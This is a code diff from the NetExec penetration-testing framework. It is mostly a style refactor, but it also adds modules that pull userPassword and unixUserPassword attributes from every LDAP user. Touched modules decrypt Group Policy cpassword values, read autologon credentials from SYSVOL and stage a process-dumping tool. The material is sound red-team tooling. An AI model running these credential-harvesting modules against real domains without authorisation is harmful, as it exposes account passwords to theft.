|
sizeLimit=100000,
|
||||||
)
|
)
|
||||||
except ldap.LDAPSearchError as e:
|
except ldap.LDAPSearchError as e:
|
||||||
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
||||||
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the" " data received")
|
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
|
||||||
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
||||||
# paged queries
|
# paged queries
|
||||||
list_sites = e.getAnswers()
|
list_sites = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
raise
|
raise
|
||||||
targetentry = None
|
get_dns_resolver(connection.host, context.log)
|
||||||
dnsresolver = get_dns_resolver(connection.host, context.log)
|
|
||||||
|
|
||||||
outdata = []
|
outdata = []
|
||||||
|
|
||||||
|
@ -168,7 +166,7 @@ class NXCModule:
|
||||||
{
|
{
|
||||||
"name": recordname,
|
"name": recordname,
|
||||||
"type": RECORD_TYPE_MAPPING[dr["Type"]],
|
"type": RECORD_TYPE_MAPPING[dr["Type"]],
|
||||||
"value": address[list(address.fields)[0]].toFqdn(),
|
"value": address[next(iter(address.fields))].toFqdn(),
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
elif dr["Type"] == 28:
|
elif dr["Type"] == 28:
|
||||||
|
@ -182,19 +180,19 @@ class NXCModule:
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
context.log.highlight("Found %d records" % len(outdata))
|
context.log.highlight(f"Found {len(outdata)} records")
|
||||||
path = expanduser("~/.nxc/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
|
path = expanduser(f"~/.nxc/logs/{connection.domain}_network_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log")
|
||||||
with codecs.open(path, "w", "utf-8") as outfile:
|
with codecs.open(path, "w", "utf-8") as outfile:
|
||||||
for row in outdata:
|
for row in outdata:
|
||||||
if self.showhosts:
|
if self.showhosts:
|
||||||
outfile.write("{}\n".format(row["name"] + "." + connection.domain))
|
outfile.write(f"{row['name'] + '.' + connection.domain}\n")
|
||||||
elif self.showall:
|
elif self.showall:
|
||||||
outfile.write("{} \t {}\n".format(row["name"] + "." + connection.domain, row["value"]))
|
outfile.write(f"{row['name'] + '.' + connection.domain} \t {row['value']}\n")
|
||||||
else:
|
else:
|
||||||
outfile.write("{}\n".format(row["value"]))
|
outfile.write(f"{row['value']}\n")
|
||||||
context.log.success("Dumped {} records to {}".format(len(outdata), path))
|
context.log.success(f"Dumped {len(outdata)} records to {path}")
|
||||||
if not self.showall and not self.showhosts:
|
if not self.showall and not self.showhosts:
|
||||||
context.log.display("To extract CIDR from the {} ip, run the following command: cat" " your_file | mapcidr -aa -silent | mapcidr -a -silent".format(len(outdata)))
|
context.log.display(f"To extract CIDR from the {len(outdata)} ip, run the following command: cat your_file | mapcidr -aa -silent | mapcidr -a -silent")
|
||||||
|
|
||||||
|
|
||||||
class DNS_RECORD(Structure):
|
class DNS_RECORD(Structure):
|
||||||
|
@ -250,9 +248,9 @@ class DNS_COUNT_NAME(Structure):
|
||||||
def toFqdn(self):
|
def toFqdn(self):
|
||||||
ind = 0
|
ind = 0
|
||||||
labels = []
|
labels = []
|
||||||
for i in range(self["LabelCount"]):
|
for _i in range(self["LabelCount"]):
|
||||||
nextlen = unpack("B", self["RawName"][ind : ind + 1])[0]
|
nextlen = unpack("B", self["RawName"][ind: ind + 1])[0]
|
||||||
labels.append(self["RawName"][ind + 1 : ind + 1 + nextlen].decode("utf-8"))
|
labels.append(self["RawName"][ind + 1: ind + 1 + nextlen].decode("utf-8"))
|
||||||
ind += nextlen + 1
|
ind += nextlen + 1
|
||||||
# For the final dot
|
# For the final dot
|
||||||
labels.append("")
|
labels.append("")
|
|
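The DNS_COUNT_NAME.toFqdn() method shown in the get-network module above walks length-prefixed labels out of the raw dnsRecord blob. A standalone sketch of the same walk, with a made-up three-label example, shows what the loop is doing; the final join back into a dotted name is an assumption based on the trailing empty label the method appends.

from struct import unpack

def count_name_to_fqdn(raw_name: bytes, label_count: int) -> str:
    """Rebuild an FQDN from the length-prefixed labels of a DNS_COUNT_NAME blob,
    mirroring the toFqdn() loop shown above."""
    ind = 0
    labels = []
    for _ in range(label_count):
        nextlen = unpack("B", raw_name[ind: ind + 1])[0]   # one length byte per label
        labels.append(raw_name[ind + 1: ind + 1 + nextlen].decode("utf-8"))
        ind += nextlen + 1
    labels.append("")  # trailing empty label produces the final dot
    return ".".join(labels)

# Hypothetical blob: 2-byte "dc", 7-byte "example", 5-byte "local" -> "dc.example.local."
print(count_name_to_fqdn(b"\x02dc\x07example\x05local", 3))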
@ -0,0 +1,63 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from nxc.logger import nxc_logger


class NXCModule:
    """
    Get unixUserPassword attribute from all users in ldap
    Module by @SyzikSecu
    """

    name = "get-unixUserPassword"
    description = "Get unixUserPassword attribute from all users in ldap"
    supported_protocols = ["ldap"]
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        """
        """

    def on_login(self, context, connection):
        searchFilter = "(objectclass=user)"

        try:
            context.log.debug(f"Search Filter={searchFilter}")
            resp = connection.ldapConnection.search(
                searchFilter=searchFilter,
                attributes=["sAMAccountName", "unixUserPassword"],
                sizeLimit=0,
            )
        except ldap_impacket.LDAPSearchError as e:
            if e.getErrorString().find("sizeLimitExceeded") >= 0:
                context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
                resp = e.getAnswers()
            else:
                nxc_logger.debug(e)
                return False

        answers = []
        context.log.debug(f"Total of records returned {len(resp)}")
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            sAMAccountName = ""
            unixUserPassword = []
            try:
                for attribute in item["attributes"]:
                    if str(attribute["type"]) == "sAMAccountName":
                        sAMAccountName = str(attribute["vals"][0])
                    elif str(attribute["type"]) == "unixUserPassword":
                        unixUserPassword = [str(i) for i in attribute["vals"]]
                if sAMAccountName != "" and len(unixUserPassword) > 0:
                    answers.append([sAMAccountName, unixUserPassword])
            except Exception as e:
                context.log.debug("Exception:", exc_info=True)
                context.log.debug(f"Skipping item, cannot process due to error {e!s}")
        if len(answers) > 0:
            context.log.success("Found following users: ")
            for answer in answers:
                context.log.highlight(f"User: {answer[0]} unixUserPassword: {answer[1]}")
        else:
            context.log.fail("No unixUserPassword Found")
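The get-unixUserPassword hunk above and the get-userPassword hunk below walk item["attributes"] with the same per-attribute loop. A hypothetical helper like the sketch below could factor that loop out; it is not part of the commit and only restates the access pattern (attribute["type"], attribute["vals"]) used by both modules.

def entry_attributes(item):
    """Collect the attributes of one impacket SearchResultEntry into a dict;
    every attribute is returned as a list of string values."""
    attrs = {}
    for attribute in item["attributes"]:
        name = str(attribute["type"])
        attrs[name] = [str(v) for v in attribute["vals"]]
    return attrs

With such a helper, entry_attributes(item).get("sAMAccountName", [""])[0] would replace the explicit if/elif chain in both modules.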
@ -0,0 +1,63 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from nxc.logger import nxc_logger


class NXCModule:
    """
    Get userPassword attribute from all users in ldap
    Module by @SyzikSecu
    """

    name = "get-userPassword"
    description = "Get userPassword attribute from all users in ldap"
    supported_protocols = ["ldap"]
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        """
        """

    def on_login(self, context, connection):
        searchFilter = "(objectclass=user)"

        try:
            context.log.debug(f"Search Filter={searchFilter}")
            resp = connection.ldapConnection.search(
                searchFilter=searchFilter,
                attributes=["sAMAccountName", "userPassword"],
                sizeLimit=0,
            )
        except ldap_impacket.LDAPSearchError as e:
            if e.getErrorString().find("sizeLimitExceeded") >= 0:
                context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
                resp = e.getAnswers()
            else:
                nxc_logger.debug(e)
                return False

        answers = []
        context.log.debug(f"Total of records returned {len(resp)}")
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            sAMAccountName = ""
            userPassword = []
            try:
                for attribute in item["attributes"]:
                    if str(attribute["type"]) == "sAMAccountName":
                        sAMAccountName = str(attribute["vals"][0])
                    elif str(attribute["type"]) == "userPassword":
                        userPassword = [str(i) for i in attribute["vals"]]
                if sAMAccountName != "" and len(userPassword) > 0:
                    answers.append([sAMAccountName, userPassword])
            except Exception as e:
                context.log.debug("Exception:", exc_info=True)
                context.log.debug(f"Skipping item, cannot process due to error {e!s}")
        if len(answers) > 0:
            context.log.success("Found following users: ")
            for answer in answers:
                context.log.highlight(f"User: {answer[0]} userPassword: {answer[1]}")
        else:
            context.log.fail("No userPassword Found")
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
from datetime import datetime
from nxc.helpers.logger import write_log
import json
@ -20,14 +17,11 @@ class NXCModule:
    multiple_hosts = True

    def options(self, context, module_options):
-        """
-        No options
-        """
-        pass
+        """No options"""

    def on_admin_login(self, context, connection):
        data = []
-        cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
+        cards = connection.wmi("select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
        if cards:
            for c in cards:
                if c["IPAddress"].get("value"):
@ -35,6 +29,6 @@ class NXCModule:

        data.append(cards)

-        log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
+        log_name = f"network-connections-{connection.host}-{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log"
        write_log(json.dumps(data), log_name)
        context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
import xml.etree.ElementTree as ET
from io import BytesIO

@ -30,7 +27,7 @@ class NXCModule:
        paths = connection.spider("SYSVOL", pattern=["Registry.xml"])

        for path in paths:
-            context.log.display("Found {}".format(path))
+            context.log.display(f"Found {path}")

            buf = BytesIO()
            connection.conn.getFile("SYSVOL", path, buf.write)
@ -56,7 +53,7 @@ class NXCModule:
                        domains.append(attrs["value"])

            if usernames or passwords:
-                context.log.success("Found credentials in {}".format(path))
-                context.log.highlight("Usernames: {}".format(usernames))
-                context.log.highlight("Domains: {}".format(domains))
-                context.log.highlight("Passwords: {}".format(passwords))
+                context.log.success(f"Found credentials in {path}")
+                context.log.highlight(f"Usernames: {usernames}")
+                context.log.highlight(f"Domains: {domains}")
+                context.log.highlight(f"Passwords: {passwords}")
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
import xml.etree.ElementTree as ET
from Cryptodome.Cipher import AES
from base64 import b64decode
@ -43,7 +40,7 @@ class NXCModule:
        )

        for path in paths:
-            context.log.display("Found {}".format(path))
+            context.log.display(f"Found {path}")

            buf = BytesIO()
            connection.conn.getFile("SYSVOL", path, buf.write)
@ -57,10 +54,7 @@ class NXCModule:
                sections.append("./NTService/Properties")

            elif "ScheduledTasks.xml" in path:
-                sections.append("./Task/Properties")
-                sections.append("./ImmediateTask/Properties")
-                sections.append("./ImmediateTaskV2/Properties")
-                sections.append("./TaskV2/Properties")
+                sections.extend(("./Task/Properties", "./ImmediateTask/Properties", "./ImmediateTaskV2/Properties", "./TaskV2/Properties"))

            elif "DataSources.xml" in path:
                sections.append("./DataSource/Properties")
@ -88,11 +82,11 @@ class NXCModule:

                password = self.decrypt_cpassword(props["cpassword"])

-                context.log.success("Found credentials in {}".format(path))
-                context.log.highlight("Password: {}".format(password))
+                context.log.success(f"Found credentials in {path}")
+                context.log.highlight(f"Password: {password}")
                for k, v in props.items():
                    if k != "cpassword":
-                        context.log.highlight("{}: {}".format(k, v))
+                        context.log.highlight(f"{k}: {v}")

                hostid = context.db.get_hosts(connection.host)[0][0]
                context.db.add_credential(
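decrypt_cpassword() is called above but its body falls outside the hunk. For context, GPP cpassword values are AES-256-CBC encrypted with a key Microsoft published in MS-GPPREF, which is why the module can recover them offline. A hedged standalone sketch of the conventional decryption follows; the function name and padding handling are mine, while the key is the published constant.

from base64 import b64decode
from Cryptodome.Cipher import AES

# AES-256 key published by Microsoft for Group Policy Preferences cpassword values
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

def decrypt_cpassword(cpassword: str) -> str:
    # Restore the base64 padding that GPP strips from the stored value
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    decrypted = AES.new(GPP_KEY, AES.MODE_CBC, b"\x00" * 16).decrypt(b64decode(cpassword))
    # Strip PKCS#7 padding, then decode the UTF-16-LE plaintext
    return decrypted[:-decrypted[-1]].decode("utf-16-le")

Feeding this the cpassword string from a Groups.xml or ScheduledTasks.xml entry yields the plaintext that the module prints with context.log.highlight.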
@ -0,0 +1,91 @@
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Module by CyberCelt: @Cyb3rC3lt
|
||||||
|
|
||||||
|
Initial module:
|
||||||
|
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
||||||
|
"""
|
||||||
|
|
||||||
|
name = "group-mem"
|
||||||
|
description = "Retrieves all the members within a Group"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = False
|
||||||
|
primaryGroupID = ""
|
||||||
|
answers = []
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
"""
|
||||||
|
group-mem: Specify group-mem to call the module
|
||||||
|
GROUP: Specify the GROUP option to query for that group's members
|
||||||
|
Usage: nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
|
||||||
|
nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
|
||||||
|
"""
|
||||||
|
self.GROUP = ""
|
||||||
|
|
||||||
|
if "GROUP" in module_options:
|
||||||
|
self.GROUP = module_options["GROUP"]
|
||||||
|
else:
|
||||||
|
context.log.error("GROUP option is required!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
# First look up the SID of the group passed in
|
||||||
|
search_filter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
||||||
|
attribute = "objectSid"
|
||||||
|
|
||||||
|
search_result = do_search(self, context, connection, search_filter, attribute)
|
||||||
|
# If no SID for the Group is returned exit the program
|
||||||
|
if search_result is None:
|
||||||
|
context.log.success('Unable to find any members of the "' + self.GROUP + '" group')
|
||||||
|
return True
|
||||||
|
|
||||||
|
# Convert the binary SID to a primaryGroupID string to be used further
|
||||||
|
sid_string = connection.sid_to_str(search_result).split("-")
|
||||||
|
self.primaryGroupID = sid_string[-1]
|
||||||
|
|
||||||
|
# Look up the groups DN
|
||||||
|
search_filter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
||||||
|
attribute = "distinguishedName"
|
||||||
|
distinguished_name = (do_search(self, context, connection, search_filter, attribute)).decode("utf-8")
|
||||||
|
|
||||||
|
# Carry out the search
|
||||||
|
search_filter = "(|(memberOf=" + distinguished_name + ")(primaryGroupID=" + self.primaryGroupID + "))"
|
||||||
|
attribute = "sAMAccountName"
|
||||||
|
search_result = do_search(self, context, connection, search_filter, attribute)
|
||||||
|
|
||||||
|
if len(self.answers) > 0:
|
||||||
|
context.log.success("Found the following members of the " + self.GROUP + " group:")
|
||||||
|
for answer in self.answers:
|
||||||
|
context.log.highlight(f"{answer[0]}")
|
||||||
|
|
||||||
|
|
||||||
|
# Carry out an LDAP search for the Group with the supplied Group name
|
||||||
|
def do_search(self, context, connection, searchFilter, attributeName):
|
||||||
|
try:
|
||||||
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
|
resp = connection.ldapConnection.search(searchFilter=searchFilter, attributes=[attributeName], sizeLimit=0)
|
||||||
|
context.log.debug(f"Total number of records returned {len(resp)}")
|
||||||
|
for item in resp:
|
||||||
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
|
continue
|
||||||
|
attribute_value = ""
|
||||||
|
try:
|
||||||
|
for attribute in item["attributes"]:
|
||||||
|
if str(attribute["type"]) == attributeName:
|
||||||
|
if attributeName in ["objectSid", "distinguishedName"]:
|
||||||
|
return bytes(attribute["vals"][0])
|
||||||
|
else:
|
||||||
|
attribute_value = str(attribute["vals"][0])
|
||||||
|
if attribute_value is not None:
|
||||||
|
self.answers.append([attribute_value])
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug("Exception:", exc_info=True)
|
||||||
|
context.log.debug(f"Skipping item, cannot process due to error {e}")
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug(f"Exception: {e}")
|
||||||
|
return False
|
|
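The rewritten group-mem module above relies on connection.sid_to_str() to turn the group's binary objectSid into a string, then takes the last dash-separated block as the RID used for primaryGroupID matching. A standalone sketch of that conversion (standard SID layout: revision byte, sub-authority count, 48-bit authority, then little-endian 32-bit sub-authorities) shows where that RID comes from; the helper name is mine.

from struct import unpack

def sid_bytes_to_str(sid: bytes) -> str:
    """Convert a binary objectSid into the familiar S-1-5-21-... form."""
    revision = sid[0]
    sub_count = sid[1]
    authority = int.from_bytes(sid[2:8], "big")          # 48-bit identifier authority
    subs = [unpack("<I", sid[8 + 4 * i: 12 + 4 * i])[0] for i in range(sub_count)]
    return "S-" + "-".join(str(p) for p in [revision, authority, *subs])

sid_bytes_to_str(search_result).split("-")[-1] is exactly the value the module stores in self.primaryGroupID.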
@ -1,100 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
|
||||||
|
|
||||||
class NXCModule:
|
|
||||||
'''
|
|
||||||
Module by CyberCelt: @Cyb3rC3lt
|
|
||||||
|
|
||||||
Initial module:
|
|
||||||
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
|
||||||
'''
|
|
||||||
|
|
||||||
name = 'group-mem'
|
|
||||||
description = 'Retrieves all the members within a Group'
|
|
||||||
supported_protocols = ['ldap']
|
|
||||||
opsec_safe = True
|
|
||||||
multiple_hosts = False
|
|
||||||
primaryGroupID = ''
|
|
||||||
answers = []
|
|
||||||
|
|
||||||
def options(self, context, module_options):
|
|
||||||
'''
|
|
||||||
group-mem: Specify group-mem to call the module
|
|
||||||
GROUP: Specify the GROUP option to query for that group's members
|
|
||||||
Usage: nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
|
|
||||||
nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
|
|
||||||
'''
|
|
||||||
|
|
||||||
self.GROUP = ''
|
|
||||||
|
|
||||||
if 'GROUP' in module_options:
|
|
||||||
self.GROUP = module_options['GROUP']
|
|
||||||
else:
|
|
||||||
context.log.error('GROUP option is required!')
|
|
||||||
exit(1)
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
|
||||||
|
|
||||||
#First look up the SID of the group passed in
|
|
||||||
searchFilter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
|
||||||
attribute = "objectSid"
|
|
||||||
|
|
||||||
searchResult = doSearch(self, context, connection, searchFilter, attribute)
|
|
||||||
#If no SID for the Group is returned exit the program
|
|
||||||
if searchResult is None:
|
|
||||||
context.log.success('Unable to find any members of the "' + self.GROUP + '" group')
|
|
||||||
return True
|
|
||||||
|
|
||||||
# Convert the binary SID to a primaryGroupID string to be used further
|
|
||||||
sidString = connection.sid_to_str(searchResult).split("-")
|
|
||||||
self.primaryGroupID = sidString[-1]
|
|
||||||
|
|
||||||
#Look up the groups DN
|
|
||||||
searchFilter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
|
||||||
attribute = "distinguishedName"
|
|
||||||
distinguishedName = (doSearch(self, context, connection, searchFilter, attribute)).decode("utf-8")
|
|
||||||
|
|
||||||
# Carry out the search
|
|
||||||
searchFilter = "(|(memberOf="+distinguishedName+")(primaryGroupID="+self.primaryGroupID+"))"
|
|
||||||
attribute = "sAMAccountName"
|
|
||||||
searchResult = doSearch(self, context, connection, searchFilter, attribute)
|
|
||||||
|
|
||||||
if len(self.answers) > 0:
|
|
||||||
context.log.success('Found the following members of the ' + self.GROUP + ' group:')
|
|
||||||
for answer in self.answers:
|
|
||||||
context.log.highlight(u'{}'.format(answer[0]))
|
|
||||||
|
|
||||||
# Carry out an LDAP search for the Group with the supplied Group name
|
|
||||||
def doSearch(self,context, connection,searchFilter,attributeName):
|
|
||||||
try:
|
|
||||||
context.log.debug('Search Filter=%s' % searchFilter)
|
|
||||||
resp = connection.ldapConnection.search(searchFilter=searchFilter,
|
|
||||||
attributes=[attributeName],
|
|
||||||
sizeLimit=0)
|
|
||||||
context.log.debug('Total no. of records returned %d' % len(resp))
|
|
||||||
for item in resp:
|
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
|
||||||
continue
|
|
||||||
attributeValue = '';
|
|
||||||
try:
|
|
||||||
for attribute in item['attributes']:
|
|
||||||
if str(attribute['type']) == attributeName:
|
|
||||||
if attributeName == "objectSid":
|
|
||||||
attributeValue = bytes(attribute['vals'][0])
|
|
||||||
return attributeValue;
|
|
||||||
elif attributeName == "distinguishedName":
|
|
||||||
attributeValue = bytes(attribute['vals'][0])
|
|
||||||
return attributeValue;
|
|
||||||
else:
|
|
||||||
attributeValue = str(attribute['vals'][0])
|
|
||||||
if attributeValue is not None:
|
|
||||||
self.answers.append([attributeValue])
|
|
||||||
except Exception as e:
|
|
||||||
context.log.debug("Exception:", exc_info=True)
|
|
||||||
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
|
|
||||||
pass
|
|
||||||
except Exception as e:
|
|
||||||
context.log.debug("Exception:", e)
|
|
||||||
return False
|
|
|
@ -1,8 +1,6 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from impacket.ldap import ldap as ldap_impacket
|
from impacket.ldap import ldap as ldap_impacket
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
|
@ -21,27 +19,24 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""USER Choose a username to query group membership"""
|
||||||
USER Choose a username to query group membership
|
|
||||||
"""
|
|
||||||
|
|
||||||
self.user = ""
|
self.user = ""
|
||||||
if "USER" in module_options:
|
if "USER" in module_options:
|
||||||
if module_options["USER"] == "":
|
if module_options["USER"] == "":
|
||||||
context.log.fail("Invalid value for USER option!")
|
context.log.fail("Invalid value for USER option!")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
self.user = module_options["USER"]
|
self.user = module_options["USER"]
|
||||||
else:
|
else:
|
||||||
context.log.fail("Missing USER option, use --options to list available parameters")
|
context.log.fail("Missing USER option, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
||||||
# Building the search filter
|
# Building the search filter
|
||||||
searchFilter = "(&(objectClass=user)(sAMAccountName={}))".format(self.user)
|
searchFilter = f"(&(objectClass=user)(sAMAccountName={self.user}))"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
context.log.debug("Search Filter=%s" % searchFilter)
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
resp = connection.ldapConnection.search(
|
resp = connection.ldapConnection.search(
|
||||||
searchFilter=searchFilter,
|
searchFilter=searchFilter,
|
||||||
attributes=["memberOf", "primaryGroupID"],
|
attributes=["memberOf", "primaryGroupID"],
|
||||||
|
@ -53,7 +48,6 @@ class NXCModule:
|
||||||
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
||||||
# paged queries
|
# paged queries
|
||||||
resp = e.getAnswers()
|
resp = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
context.log.debug(e)
|
context.log.debug(e)
|
||||||
return False
|
return False
|
||||||
|
@ -61,7 +55,7 @@ class NXCModule:
|
||||||
memberOf = []
|
memberOf = []
|
||||||
primaryGroupID = ""
|
primaryGroupID = ""
|
||||||
|
|
||||||
context.log.debug("Total of records returned %d" % len(resp))
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
for item in resp:
|
for item in resp:
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
|
@ -75,16 +69,12 @@ class NXCModule:
|
||||||
if str(primaryGroupID) == "513":
|
if str(primaryGroupID) == "513":
|
||||||
memberOf.append("CN=Domain Users,CN=Users,DC=XXXXX,DC=XXX")
|
memberOf.append("CN=Domain Users,CN=Users,DC=XXXXX,DC=XXX")
|
||||||
elif str(attribute["type"]) == "memberOf":
|
elif str(attribute["type"]) == "memberOf":
|
||||||
for group in attribute["vals"]:
|
memberOf += [str(group) for group in attribute["vals"] if isinstance(group._value, bytes)]
|
||||||
if isinstance(group._value, bytes):
|
|
||||||
memberOf.append(str(group))
|
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Exception:", exc_info=True)
|
context.log.debug("Exception:", exc_info=True)
|
||||||
context.log.debug("Skipping item, cannot process due to error %s" % str(e))
|
context.log.debug(f"Skipping item, cannot process due to error {e!s}")
|
||||||
pass
|
|
||||||
if len(memberOf) > 0:
|
if len(memberOf) > 0:
|
||||||
context.log.success("User: {} is member of following groups: ".format(self.user))
|
context.log.success(f"User: {self.user} is member of following groups: ")
|
||||||
for group in memberOf:
|
for group in memberOf:
|
||||||
# Split the string on the "," character to get a list of the group name and parent group names
|
# Split the string on the "," character to get a list of the group name and parent group names
|
||||||
group_parts = group.split(",")
|
group_parts = group.split(",")
|
||||||
|
@ -93,5 +83,4 @@ class NXCModule:
|
||||||
# and splitting it on the "=" character to get a list of the group name and its prefix (e.g., "CN")
|
# and splitting it on the "=" character to get a list of the group name and its prefix (e.g., "CN")
|
||||||
group_name = group_parts[0].split("=")[1]
|
group_name = group_parts[0].split("=")[1]
|
||||||
|
|
||||||
# print("Group name: %s" % group_name)
|
context.log.highlight(f"{group_name}")
|
||||||
context.log.highlight("{}".format(group_name))
|
|
||||||
|
|
|
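The groupmembership module above special-cases primaryGroupID 513 because "Domain Users" membership is stored as a primary group RID rather than as a memberOf entry. The same idea extends to the other default primary groups; a small hypothetical lookup table (the RIDs are the well-known defaults, the helper itself is not part of the commit):

WELL_KNOWN_PRIMARY_GROUPS = {
    "513": "Domain Users",
    "514": "Domain Guests",
    "515": "Domain Computers",
    "516": "Domain Controllers",
    "521": "Read-only Domain Controllers",
}

def primary_group_name(primary_group_id) -> str:
    # Fall back to showing the raw RID for anything that is not a well-known default
    return WELL_KNOWN_PRIMARY_GROUPS.get(str(primary_group_id), f"RID {primary_group_id}")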
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
# handlekatz module for nxc python3
|
# handlekatz module for nxc python3
|
||||||
# author of the module : github.com/mpgn
|
# author of the module : github.com/mpgn
|
||||||
# HandleKatz: https://github.com/codewhitesec/HandleKatz
|
# HandleKatz: https://github.com/codewhitesec/HandleKatz
|
||||||
|
@ -10,6 +7,7 @@ import re
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from nxc.helpers.bloodhound import add_user_bh
|
from nxc.helpers.bloodhound import add_user_bh
|
||||||
|
import pypykatz
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
|
@ -20,13 +18,12 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
||||||
HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/)
|
HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/)
|
||||||
HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)
|
HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)
|
||||||
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
|
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
self.share = "C$"
|
self.share = "C$"
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
